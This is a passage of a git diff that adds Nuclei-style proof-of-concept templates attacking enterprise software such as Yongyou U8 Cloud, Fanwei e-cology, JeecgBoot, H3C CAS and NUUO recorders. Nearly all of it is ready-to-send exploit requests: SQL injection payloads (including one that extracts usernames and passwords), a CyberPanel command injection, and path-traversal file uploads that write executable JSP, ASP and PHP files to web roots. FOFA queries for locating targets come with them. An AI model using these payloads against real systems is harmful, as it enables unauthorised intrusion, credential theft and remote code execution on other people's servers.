stop-at-first-match: true + + matchers: + - type: dsl + dsl: + - status_code_1==200 && contains_all(body_1,'qvbvqqkbjq') + - status_code_2==200 && contains_all(body_2,'qkxqq123321qzkbq') \ No newline at end of file diff --git a/poc/sql/yongyou-u8c-cloud-approveservlet-sqli.yaml b/poc/sql/yongyou-u8c-cloud-approveservlet-sqli.yaml new file mode 100644 index 0000000000..a61dadc7ae --- /dev/null +++ b/poc/sql/yongyou-u8c-cloud-approveservlet-sqli.yaml @@ -0,0 +1,22 @@ +id: yongyou-u8c-cloud-approveservlet-sqli + +info: + name: yongyou-u8c-cloud-approveservlet-sqli + author: PokerSec + severity: high + metadata: + fofasearch: body="/api/uclient/public/" + +http: + - raw: + - | + POST /service/approveservlet HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + BILLID=123%27%20AND%20(SELECT%20CHAR%28113%29%2BCHAR%28122%29%2BCHAR%2898%29%2BCHAR%28107%29%2BCHAR%28113%29%2B%28CASE%20WHEN%20%28CHARINDEX%28CHAR%2849%29%2BCHAR%2854%29%2BCHAR%2846%29%2BCHAR%2848%29%2BCHAR%2846%29%2C%40%40VERSION%29%3E0%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28113%29)=1--%20VEQc&BILLTYPE=4331&USERID=3&RESULT=4&DATASOURCE=U8cloud + + matchers: + - type: dsl + dsl: + - status_code==200 && contains_all(body,"resultdescription") && contains_all(body,"qzbkq0qjqkq") diff --git a/poc/sql/zhilink-SRM-quickReceiptDetail-sqli.yaml b/poc/sql/zhilink-SRM-quickReceiptDetail-sqli.yaml new file mode 100644 index 0000000000..fad86668a8 --- /dev/null +++ b/poc/sql/zhilink-SRM-quickReceiptDetail-sqli.yaml @@ -0,0 +1,20 @@ +id: zhilink-SRM-quickReceiptDetail-sqli + +info: + name: zhilink-SRM-quickReceiptDetail-sqli + author: PokerSec + severity: high + metadata: + fofasearch: body="assets/js/jweixin-1.4.0.js" + +http: + - raw: + - | + GET /adpweb/api/srm/delivery/quickReceiptDetail?orderBy=1%20AND%20GTID_SUBSET(CONCAT(0x7162786b71,(SELECT%20(ELT(3060=3060,1))),0x7176787671),3060) HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + condition: and + dsl: + - status_code == 200 && contains_all(body,"qbxkq1qvxvq") \ No newline at end of file diff --git a/poc/sql_injection/cyberpanel-upgrademysqlstatus-rce.yaml b/poc/sql_injection/cyberpanel-upgrademysqlstatus-rce.yaml new file mode 100644 index 0000000000..9527fa8bbe --- /dev/null +++ b/poc/sql_injection/cyberpanel-upgrademysqlstatus-rce.yaml @@ -0,0 +1,24 @@ +id: cyberpanel-upgrademysqlstatus-rce + +info: + name: cyberpanel-upgrademysqlstatus-rce + author: PokerSec + severity: critical + metadata: + fofasearch: app="CyberPanel" + +http: + - raw: + - | + GET /dataBases/upgrademysqlstatus HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 + Content-Type: application/json + Connection: close + + {"statusfile":"1;id;#"} + + matchers: + - type: dsl + dsl: + - status_code==200 && contains_all(body,"uid=") && contains_all(body,"gid=") \ No newline at end of file diff --git a/poc/sql_injection/fanwei-Ecology-LoginSSO-sqli.yaml b/poc/sql_injection/fanwei-Ecology-LoginSSO-sqli.yaml new file mode 100644 index 0000000000..2c70d7a8b4 --- /dev/null +++ b/poc/sql_injection/fanwei-Ecology-LoginSSO-sqli.yaml @@ -0,0 +1,29 @@ +id: fanwei-Ecology-LoginSSO-sqli + +info: + name: fanwei-Ecology-LoginSSO-sqli + author: PokerSec + severity: high + metadata: + fofasearch: app="泛微-OA(e-cology)" + +requests: + - raw: + - |+ + GET /weaver/FileDownloadLocation/login/LoginSSO.%2520jsp?ddcode=7ea7ef3c41d67297&mrfuuid=1%27;if+db_name(1)=%27master%27+WAITFOR+delay+%270:0:3%27--+&mailid=0&a=.swf HTTP/1.1 + Host: {{Hostname}} + Connection: close + Accept-Encoding: gzip, deflate + + matchers: + - type: dsl + condition: and + dsl: + - duration > 3 && duration < 6 && status_code==302 + + + + extractors: + - type: dsl + dsl: + - duration \ No newline at end of file diff --git a/poc/sql_injection/fanwei-Ecology-browser-sqli-CNVD-2023-12632.yaml b/poc/sql_injection/fanwei-Ecology-browser-sqli-CNVD-2023-12632.yaml new file mode 100644 index 0000000000..85846ae883 --- /dev/null +++ b/poc/sql_injection/fanwei-Ecology-browser-sqli-CNVD-2023-12632.yaml @@ -0,0 +1,28 @@ +id: fanwei-Ecology-browser-sqli + +info: + name: fanwei-Ecology-browser-sqli + author: PokerSec + severity: high + metadata: + fofasearch: app="泛微-OA(e-cology)" + +requests: + - raw: + - |- + POST /mobile/%20/plugin/browser.jsp HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%38%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%30%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%37%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%36%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%38%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%36%34%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%33%37%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%37%25%32%35%25%33%36%25%33%38%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%33%37%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%33%34%25%32%35%25%33%33%25%36%34%25%32%35%25%33%32%25%33%37%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%39%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%33%34%25%32%35%25%33%36%25%36%34%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%37 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - countSql + - baseSql + - type: status + status: + - 200 diff --git a/poc/sql_injection/jeecg-boot-getTotalData-sqli-CVE-2024-48307.yaml b/poc/sql_injection/jeecg-boot-getTotalData-sqli-CVE-2024-48307.yaml new file mode 100644 index 0000000000..fb0e831cf5 --- /dev/null +++ b/poc/sql_injection/jeecg-boot-getTotalData-sqli-CVE-2024-48307.yaml @@ -0,0 +1,23 @@ +id: jeecg-boot-getTotalData-sqli-CVE-2024-48307 + +info: + name: jeecg-boot-getTotalData-sqli-CVE-2024-48307 + author: PokerSec + severity: high + metadata: + fofasearch: app="JeecgBoot-企业级低代码平台" || body="/_app.config.js?v=3.7.1" + +http: + - raw: + - |- + POST /jeecg-boot/drag/onlDragDatasetHead/getTotalData HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"tableName":"sys_user","compName":"test","condition":{"filter":{}},"config":{"assistValue":[],"assistType":[],"name":[{"fieldName":"concat(username,0x3a,password)","fieldType":"string"},{"fieldName":"id","fieldType":"string"}],"value":[{"fieldName":"id","fieldType":"1"}],"type":[]}} + + matchers: + - type: dsl + condition: and + dsl: + - status_code==200 && contains_all(body,"chartData") && contains_all(body,"concat(username") && contains_all(body,"yAxisIndex") \ No newline at end of file diff --git a/poc/sql_injection/qiwang-ERP-drawGrid-sqli.yaml b/poc/sql_injection/qiwang-ERP-drawGrid-sqli.yaml new file mode 100644 index 0000000000..ff2f12c411 --- /dev/null +++ b/poc/sql_injection/qiwang-ERP-drawGrid-sqli.yaml @@ -0,0 +1,29 @@ +id: qiwang-ERP-drawGrid-sqli + +info: + name: qiwang-ERP-drawGrid-sqli + author: PokerSec + severity: critical + metadata: + fofasearch: app="企望-ERP系统" + +http: + - raw: + - | + POST /mainFunctions/drawGrid.action;cookieLogin.action HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + tablename=1';WAITFOR DELAY '0:0:3'-- + + + matchers: + - type: dsl + condition: and + dsl: + - status_code==200 && duration > 3 && duration < 6 + + extractors: + - type: dsl + dsl: + - duration \ No newline at end of file diff --git a/poc/sql_injection/yongyou-nc-process-sqli.yaml b/poc/sql_injection/yongyou-nc-process-sqli.yaml new file mode 100644 index 0000000000..d4310a0d4c --- /dev/null +++ b/poc/sql_injection/yongyou-nc-process-sqli.yaml @@ -0,0 +1,26 @@ +id: yongyou-nc-process-sqli + +info: + name: yongyou-nc-process-sqli + author: PokerSec + severity: high + metadata: + fofasearch: body="/Client/Uclient/UClient.exe" || app="用友-UFIDA-NC" + +http: + - raw: + - | + GET /portal/pt/task/process?pageId=login&id=1&pluginid=1%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(118)||CHR(98)||CHR(118)||CHR(113)||CHR(113)||CHR(107)||CHR(98)||CHR(106)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20 HTTP/1.1 + Host: {{Hostname}} + + - | + GET /portal/pt/task/process?pageId=login&id=1&pluginid=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%2BISNULL%28CAST%28111%2A1111%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%2BCHAR%28113%29%2BCHAR%28122%29%2BCHAR%28107%29%2BCHAR%2898%29%2BCHAR%28113%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 HTTP/1.1 + Host: {{Hostname}} + + stop-at-first-match: true + + matchers: + - type: dsl + dsl: + - status_code_1==200 && contains_all(body_1,'qvbvqqkbjq') + - status_code_2==200 && contains_all(body_2,'qkxqq123321qzkbq') \ No newline at end of file diff --git a/poc/sql_injection/yongyou-u8c-cloud-approveservlet-sqli.yaml b/poc/sql_injection/yongyou-u8c-cloud-approveservlet-sqli.yaml new file mode 100644 index 0000000000..a61dadc7ae --- /dev/null +++ b/poc/sql_injection/yongyou-u8c-cloud-approveservlet-sqli.yaml @@ -0,0 +1,22 @@ +id: yongyou-u8c-cloud-approveservlet-sqli + +info: + name: yongyou-u8c-cloud-approveservlet-sqli + author: PokerSec + severity: high + metadata: + fofasearch: body="/api/uclient/public/" + +http: + - raw: + - | + POST /service/approveservlet HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + BILLID=123%27%20AND%20(SELECT%20CHAR%28113%29%2BCHAR%28122%29%2BCHAR%2898%29%2BCHAR%28107%29%2BCHAR%28113%29%2B%28CASE%20WHEN%20%28CHARINDEX%28CHAR%2849%29%2BCHAR%2854%29%2BCHAR%2846%29%2BCHAR%2848%29%2BCHAR%2846%29%2C%40%40VERSION%29%3E0%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28113%29)=1--%20VEQc&BILLTYPE=4331&USERID=3&RESULT=4&DATASOURCE=U8cloud + + matchers: + - type: dsl + dsl: + - status_code==200 && contains_all(body,"resultdescription") && contains_all(body,"qzbkq0qjqkq") diff --git a/poc/sql_injection/zhilink-SRM-quickReceiptDetail-sqli.yaml b/poc/sql_injection/zhilink-SRM-quickReceiptDetail-sqli.yaml new file mode 100644 index 0000000000..fad86668a8 --- /dev/null +++ b/poc/sql_injection/zhilink-SRM-quickReceiptDetail-sqli.yaml @@ -0,0 +1,20 @@ +id: zhilink-SRM-quickReceiptDetail-sqli + +info: + name: zhilink-SRM-quickReceiptDetail-sqli + author: PokerSec + severity: high + metadata: + fofasearch: body="assets/js/jweixin-1.4.0.js" + +http: + - raw: + - | + GET /adpweb/api/srm/delivery/quickReceiptDetail?orderBy=1%20AND%20GTID_SUBSET(CONCAT(0x7162786b71,(SELECT%20(ELT(3060=3060,1))),0x7176787671),3060) HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + condition: and + dsl: + - status_code == 200 && contains_all(body,"qbxkq1qvxvq") \ No newline at end of file diff --git a/poc/upload/EKing-Base64Upload-fileupload.yaml b/poc/upload/EKing-Base64Upload-fileupload.yaml new file mode 100644 index 0000000000..e0902982c6 --- /dev/null +++ b/poc/upload/EKing-Base64Upload-fileupload.yaml @@ -0,0 +1,31 @@ +id: EKing-Base64Upload-fileupload + +info: + name: EKing-Base64Upload-fileupload + author: PokerSec + severity: critical + metadata: + fofasearch: app="EKing-管理易" +variables: + filename: "{{to_lower(rand_base(10))}}" + + +http: + - raw: + - | + POST /Base64Upload.ihtm HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + base64_str=data:image//../../../{{filename}}.jsp.;base64,dGVzdDEyM3Rlc3Q= + + - | + GET /{{filename}}.jsp HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + matchers: + - type: dsl + dsl: + - status_code==200 && contains_all(body_2,"test123test") + diff --git a/poc/upload/chanjet-TPlus-FileUploadHandler-uploadfile.yaml b/poc/upload/chanjet-TPlus-FileUploadHandler-uploadfile.yaml new file mode 100644 index 0000000000..824f0098d2 --- /dev/null +++ b/poc/upload/chanjet-TPlus-FileUploadHandler-uploadfile.yaml @@ -0,0 +1,36 @@ +id: chanjet-TPlus-FileUploadHandler-uploadfile + +info: + name: chanjet-TPlus-FileUploadHandler-uploadfile + author: PokerSec + severity: critical + metadata: + fofasearch: app="畅捷通-TPlus" +variables: + filename: "{{to_lower(rand_base(6))}}" + flag: "{{to_lower(rand_base(10))}}" +requests: + - raw: + - |- + POST /tplus/SM/SetupAccount/FileUploadHandler.ashx/;/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=f95ec6be8c3acff8e3edd3d910d3b9a6 + + --f95ec6be8c3acff8e3edd3d910d3b9a6 + Content-Disposition: form-data; name="file"; filename="{{filename}}.txt" + Content-Type: image/jpeg + + {{flag}} + --f95ec6be8c3acff8e3edd3d910d3b9a6-- + - |- + GET /tplus/UserFiles/{{filename}}.txt HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'status_code_1 == 200' + - 'status_code_2 == 200' + - 'contains(body_2,"{{flag}}")' + condition: and diff --git a/poc/upload/filestack-upload-eef332a3e9a940fc24b6a8b85a58d6b7.yaml b/poc/upload/filestack-upload-eef332a3e9a940fc24b6a8b85a58d6b7.yaml new file mode 100644 index 0000000000..8e1c5f5c79 --- /dev/null +++ b/poc/upload/filestack-upload-eef332a3e9a940fc24b6a8b85a58d6b7.yaml @@ -0,0 +1,59 @@ +id: filestack-upload-eef332a3e9a940fc24b6a8b85a58d6b7 + +info: + name: > + Filestack Official <= 2.0.0 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/559a94d8-527d-48b3-a917-461ebfa012bc?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/filestack-upload/" + google-query: inurl:"/wp-content/plugins/filestack-upload/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,filestack-upload,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/filestack-upload/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "filestack-upload" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.0') \ No newline at end of file diff --git a/poc/upload/h3c-CAS-CVM-fd-uploadfile.yaml b/poc/upload/h3c-CAS-CVM-fd-uploadfile.yaml new file mode 100644 index 0000000000..43e5425e5d --- /dev/null +++ b/poc/upload/h3c-CAS-CVM-fd-uploadfile.yaml @@ -0,0 +1,42 @@ +id: h3c-CAS-CVM-fd-uploadfile + +info: + name: h3c-CAS-CVM-fd-uploadfile + author: PokerSEC + severity: critical + metadata: + fofasearch: body="css/img/loginpage.png" +variables: + filename: "{{to_lower(rand_base(10))}}" + flag: "{{to_lower(rand_base(10))}}" +http: + - raw: + - |- + POST /cas/fileUpload/fd HTTP/1.1 + Host: + Accept-Encoding: gzip, deflate + Accept: */* + Connection: close + Content-Type: multipart/form-data; boundary=WebKitFormBoundaryMMqEBbEFHlzOcYq4 + + --WebKitFormBoundaryMMqEBbEFHlzOcYq4 + Content-Disposition: form-data; name="token" + + /../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/{{filename}}.jsp + --WebKitFormBoundaryMMqEBbEFHlzOcYq4 + Content-Disposition: form-data; name="file"; filename="{{filename}}.jsp" + Content-Type: image/png + + <% out.println("{{flag}}");%> + --WebKitFormBoundaryMMqEBbEFHlzOcYq4-- + + - |+ + GET /cas/js/lib/buttons/{{filename}}.jsp HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200 && status_code_2==200 && contains_all(body_2,"{{flag}}") diff --git a/poc/upload/inspur-GS-UploadListFile-uploadfile.yaml b/poc/upload/inspur-GS-UploadListFile-uploadfile.yaml new file mode 100644 index 0000000000..7d7f86e084 --- /dev/null +++ b/poc/upload/inspur-GS-UploadListFile-uploadfile.yaml @@ -0,0 +1,39 @@ +id: inspur-GS-UploadListFile-uploadfile + +info: + name: inspur-GS-UploadListFile-uploadfile + author: PokerSec + severity: critical + metadata: + fofasearch: body="/cwbase/web/gsprtf/" + +http: + - raw: + - |- + POST /cwbase/EP/ListContent/UploadListFile.ashx?uptype=attslib&keyid=1&key1=1&key2=1 HTTP/1.1 + Host: + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0 + Content-Length: 273 + Accept: / + Accept-Encoding: gzip, deflate, br + Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 + Connection: close + Content-Type: multipart/form-data; boundary=---------------------------rww5upkbw6ctf0tu5hye + + -----------------------------rww5upkbw6ctf0tu5hye + Content-Disposition: form-data; name="file"; filename="../../../../../../j1gcettjkv.asp" + Content-Type: image/png + + <% response.write("2lN0nxVzC7jYTvuIOcbWyy2AwsK")%> + -----------------------------rww5upkbw6ctf0tu5hye-- + + - |+ + GET /cwbase/j1gcettjkv.asp HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: dsl + condition: and + dsl: + - status_code_2==200 && contains_all(body_2,"2lN0nxVzC7jYTvuIOcbWyy2AwsK") \ No newline at end of file diff --git a/poc/upload/jinhuadijia-weixinshangqiang-mobile-fileupload.yaml b/poc/upload/jinhuadijia-weixinshangqiang-mobile-fileupload.yaml new file mode 100644 index 0000000000..7cdc107df0 --- /dev/null +++ b/poc/upload/jinhuadijia-weixinshangqiang-mobile-fileupload.yaml @@ -0,0 +1,33 @@ +id: jinhuadijia-weixinshangqiang-mobile-fileupload + +info: + name: jinhuadijia-weixinshangqiang-mobile-fileupload + author: PokerSec + severity: critical + metadata: + fofasearch: body="/wall/themes/meepo/assets/images/defaultbg.jpg" || title="现场活动大屏幕系统" + + +variables: + filename: "{{to_lower(rand_base(10))}}" + + +requests: + - raw: + - |+ + POST /mobile/mobile.do.php?action=msg_uploadimg HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + filetype=php&imgbase64=PD9waHAgZWNobyJzNDY5Z25uOTUwNm0ycjhyN2wzZ2JoNWszNyI7dW5saW5rKF9fRklMRV9fKTs/Pg== + + + matchers-condition: and + matchers: + - type: word + part: body + words: + - data\/pic\/pic + - type: status + status: + - 200 \ No newline at end of file diff --git a/poc/upload/meite-crm-upload-upload.yaml b/poc/upload/meite-crm-upload-upload.yaml new file mode 100644 index 0000000000..093cb653bb --- /dev/null +++ b/poc/upload/meite-crm-upload-upload.yaml @@ -0,0 +1,58 @@ +id: meite-crm-upload-upload + +info: + name: meite-crm-upload-upload + author: saf3d0s + severity: critical + description: description + reference: + - https:// + tags: tags + +requests: + - raw: + - |- + POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 + Content-Length: 708 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 + Accept-Encoding: gzip, deflate + Accept-Language: zh-CN,zh;q=0.9 + Cache-Control: max-age=0 + Connection: close + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN + Upgrade-Insecure-Requests: 1 + + ------WebKitFormBoundary1imovELzPsfzp5dN + Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp" + Content-Type: application/octet-stream + + nyhelxrutzwhrsvsrafb + ------WebKitFormBoundary1imovELzPsfzp5dN + Content-Disposition: form-data; name="key" + + null + ------WebKitFormBoundary1imovELzPsfzp5dN + Content-Disposition: form-data; name="form" + + null + ------WebKitFormBoundary1imovELzPsfzp5dN + Content-Disposition: form-data; name="field" + + null + ------WebKitFormBoundary1imovELzPsfzp5dN + Content-Disposition: form-data; name="filetitile" + + null + ------WebKitFormBoundary1imovELzPsfzp5dN + Content-Disposition: form-data; name="filefolder" + + null + ------WebKitFormBoundary1imovELzPsfzp5dN-- + + matchers-condition: and + matchers: + - type: status + status: + - 200 diff --git a/poc/upload/nuuo-upload-uploadfile.yaml b/poc/upload/nuuo-upload-uploadfile.yaml new file mode 100644 index 0000000000..0d2a57cc7f --- /dev/null +++ b/poc/upload/nuuo-upload-uploadfile.yaml @@ -0,0 +1,36 @@ +id: nuuo-upload-uploadfile + +info: + name: nuuo-upload-uploadfile + author: PokerSEC + severity: critical + metadata: + fofasearch: title="Network Video Recorder Login" +variables: + filename: "{{to_lower(rand_base(10))}}" + flag: "{{to_lower(rand_base(10))}}" +requests: + - raw: + - |- + POST /upload.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=--------WebKitFormBoundaryJmuhnxJC760qNhIs + accept: */* + Content-Length: 152 + + ----------WebKitFormBoundaryJmuhnxJC760qNhIs + Content-Disposition: form-data; name="userfile"; filename="{{filename}}.php" + + {{flag}} + ----------WebKitFormBoundaryJmuhnxJC760qNhIs-- + + - |+ + GET /{{filename}}.php HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200 && status_code_2==200 && contains_all(body_2,"{{flag}}") diff --git a/poc/upload/poguanjia-erp-uploadimgnocheck-fileupload.yaml b/poc/upload/poguanjia-erp-uploadimgnocheck-fileupload.yaml new file mode 100644 index 0000000000..204c4cf146 --- /dev/null +++ b/poc/upload/poguanjia-erp-uploadimgnocheck-fileupload.yaml @@ -0,0 +1,45 @@ +id: poguanjia-erp-uploadimgnocheck-fileupload + +info: + name: poguanjia-erp-uploadimgnocheck-fileupload + author: PokerSec + severity: critical + metadata: + fofasearch: body="/Utility/JSHeadJump.js" || icon_hash="-1513302527" + +variables: + filename: "{{to_lower(rand_base(6))}}" + flag: "{{to_lower(rand_base(8))}}" + boundary: "{{to_lower(rand_base(20))}}" + +http: + - raw: + - | + POST /api/Upload/UploadImgNoCheck?m_server_name=ShopUserImg HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 + Content-Type: multipart/form-data; boundary=---------------------------{{boundary}} + + -----------------------------{{boundary}} + Content-Disposition: form-data; name="image"; filename="{{filename}}.txt" + Content-Type: image/jpeg + + GIF89a + {{flag}} + -----------------------------{{boundary}}-- + + - | + GET {{url}} HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - status_code==200 && status_code_2==200 && contains_all(body,"{{flag}}") + + extractors: + - type: json + internal: true + name: url + json: + - '.Data[]' \ No newline at end of file diff --git a/poc/upload/yongyou-u8c-esnserver-fileupload.yaml b/poc/upload/yongyou-u8c-esnserver-fileupload.yaml new file mode 100644 index 0000000000..3fc3313fef --- /dev/null +++ b/poc/upload/yongyou-u8c-esnserver-fileupload.yaml @@ -0,0 +1,35 @@ +id: yongyou-u8c-esnserver-fileupload + +info: + name: yongyou-u8c-esnserver-fileupload + author: PokerSec + severity: critical + metadata: + fofasearch: app="用友-U8-Cloud" + + +variables: + filename: "{{to_lower(rand_base(10))}}" + + +http: + - raw: + - | + POST /service/esnserver HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip + Connection: close + Content-Type: application/x-www-form-urlencoded + Token: 469ce01522f64366750d1995ca119841 + User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 + + {"invocationInfo":{"ucode":"123","dataSource":"U8cloud","lang":"en"},"method":"uploadFile","className":"nc.itf.hr.tools.IFileTrans","param":{"p1":"UEsDBBQAAAAAAPR5NFm2C9sJVgAAAFYAAAAKAAAAY29tcHJlc3NlZDwlbmV3IGphdmEuaW8uRmlsZShhcHBsaWNhdGlvbi5nZXRSZWFsUGF0aChyZXF1ZXN0LmdldFNlcnZsZXRQYXRoKCkpKS5kZWxldGUoKTslPjEyMzEyUEsBAhQAFAAAAAAA9Hk0WbYL2wlWAAAAVgAAAAoAAAAAAAAAAAAAALaBAAAAAGNvbXByZXNzZWRQSwUGAAAAAAEAAQA4AAAAfgAAAAAA","p2":"webapps/u8c_web/{{filename}}.jsp"},"paramType":["p1:[B","p2:java.lang.String"]} + + - | + GET /{{filename}}.jsp HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - status_code==200 && contains_all(body_2,"12312") \ No newline at end of file diff --git a/poc/upload/yonyou-U8clouderp-upload-uploadfile.yaml b/poc/upload/yonyou-U8clouderp-upload-uploadfile.yaml new file mode 100644 index 0000000000..9864b40bf6 --- /dev/null +++ b/poc/upload/yonyou-U8clouderp-upload-uploadfile.yaml @@ -0,0 +1,27 @@ +id: yonyou-U8clouderp-upload-uploadfile + +info: + name: yonyou-U8clouderp-upload-uploadfile + author: PokerSec + severity: critical + metadata: + fofasearch: app="用友-U8-Cloud" +variables: + file_name: "{{to_lower(rand_text_alpha(8))}}" + file_content: "{{to_lower(rand_text_alpha(8))}}" +requests: + - raw: + - | + POST /linux/pages/upload.jsp HTTP/1.1 + Host: {{Hostname}} + filename:{{file_name}}.jsp + + {{file_content}} + - | + GET /linux/{{file_name}}.jsp HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - status_code==200 && contains_all(body_2,"{{file_content}}") diff --git a/poc/web/lanling-oa-hrstaffwebservice-fileread.yaml b/poc/web/lanling-oa-hrstaffwebservice-fileread.yaml new file mode 100644 index 0000000000..67934230a9 --- /dev/null +++ b/poc/web/lanling-oa-hrstaffwebservice-fileread.yaml @@ -0,0 +1,42 @@ +id: 